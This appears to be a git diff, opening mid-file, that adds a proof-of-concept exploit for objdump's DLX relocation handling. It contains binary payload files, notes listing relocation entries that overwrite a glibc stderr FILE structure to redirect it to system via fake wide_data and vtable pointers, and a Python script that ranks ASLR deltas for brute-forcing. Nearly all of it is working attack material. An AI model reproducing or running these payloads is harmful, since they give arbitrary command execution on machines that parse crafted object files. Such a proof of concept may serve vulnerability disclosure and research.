+system_delta=0x6f43e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..050c5e949c58bc3ace505698c91cb102d9f0cda6 GIT binary patch literal 1280 zcmd5*+e%wO6kR7L=3Xun$EsUND;AM6gf&h5kgJ z)PL|%8$ZA=s6zb%AC7CEo5y*OJ~}Y7_F8+Lotep=p9{;Mtb~PVSZlu-#{~P<%T0Of z7}7{Z-WL@l_5eEzBx*o1>$;b9piOuSNC{p6Y0(=%hCFuzWCeM?cENv~f_Fd%(LMq4 zf~P>IeD@1@WwUk;=%SwN0J=rL1`49@0Y%Ykz-#J%x_}y^Lp^UWCk4~GBaidR0WUorfj4gV6k+-rEBD~x4? z{HsqRzWRjgNoWP_K$oGXpx;4HL(f3ZLceE9(#$Iw6dj5dMUSFM(WPip^f~l7Qinc= zK8NqG)T|yiQQE9-9BqH!J=m(FbXcuD;rhpZbA1CP-8}ShCy0VQ{trlx$qe7QynN}Y zaD;K1LcAYm$@xa25$1|i*#DRhG8aUdQpdYzVun-tLU=GN*0Rn?+Bn(jo?m)%Jm3Tw Z_7^VSywG35-z`h>QJ43Oxkv8r{Q=$CfT92Z literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes new file mode 100644 index 0000000..db848c5 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x6f43e6ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f43e6ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin new file mode 100644 index 0000000000000000000000000000000000000000..05ff64425110398d125c38f83e640d443d6daf1f GIT binary patch literal 1280 zcmd5*%}QHA7(F*PdK05o6SdU}E)*&ViF0GsQc8tT6)GsW5bUBT#vc+jI1%isuh5rp zrM`nptv-M+P!#GLba8vW`{#8Q;?jYc^PTgZ`(z`ictp7Z74|=7!psFxrquE8nV8{}z7QS`i?ytCk`_+3y6>0X91A%? ahP}k)n;!;C^t)wAKIrnE@#%pFd;bsJ+km0~ literal 0 HcmV?d00001 diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes new file mode 100644 index 0000000..a345387 --- /dev/null +++ b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes @@ -0,0 +1,34 @@ +layout=wsl2404 +flag_byte4=0x06 +buf_delta=0x702fff00 +wide_delta=0x4fff0000 +system_delta=0x7043e5ff +command=P +off_io=-0x3690 off_sec=0xbb0 rbase=0x220 +sec_size_offset=0x38 + +000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 +001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 +002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690 +003 target=0x2cb sym=0x00ffffff patch reloc5 address high dword bytes 0..2 +004 target=0x2cc sym=0x000000ff patch reloc5 address high dword byte 3 +005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690 +006 target=0xbe7 sym=0x00ffffff stage write bytes at 0xbe8 +007 target=0xbe8 sym=0x000000ff finish write bytes at 0xbe8 +008 target=0xbeb sym=0x00ffffff stage write bytes at 0xbec +009 target=0xbec sym=0x000000ff finish write bytes at 0xbec +010 target=0x3ab sym=0x00ffffff patch reloc12 address high dword bytes 0..2 +011 target=0x3ac sym=0x000000ff patch reloc12 address high dword byte 3 +012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable +013 target=0x40b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x40c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x7043e5ff FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x46b sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x46c sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x4cb sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x4cc sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE diff --git a/objdump-dlx-calc-poc/tools/aslr_delta_coverage.py b/objdump-dlx-calc-poc/tools/aslr_delta_coverage.py new file mode 100644 index 0000000..8f15052 --- /dev/null +++ b/objdump-dlx-calc-poc/tools/aslr_delta_coverage.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python3 +from collections import Counter + + +STDERR = 0x2044E0 +SYSTEM = 0x58750 +PAGE = 0x1000 + + +def be_from_le32(value): + return int.from_bytes((value & 0xFFFFFFFF).to_bytes(4, "little"), "big") + + +def delta_for_base(base): + src = be_from_le32((base + STDERR) & 0xFFFFFFFF) + dst = be_from_le32((base + SYSTEM) & 0xFFFFFFFF) + return (dst - src) & 0xFFFFFFFF + + +def main(): + counts = Counter(delta_for_base(base) for base in range(0, 1 << 32, PAGE)) + total = sum(counts.values()) + covered = 0 + for delta, count in counts.most_common(): + covered += count + print(f"0x{delta:08x} pages={count} coverage={count / total:.6f} cumulative={covered / total:.6f}") + print(f"unique={len(counts)} total_pages={total}") + + +if __name__ == "__main__": + main()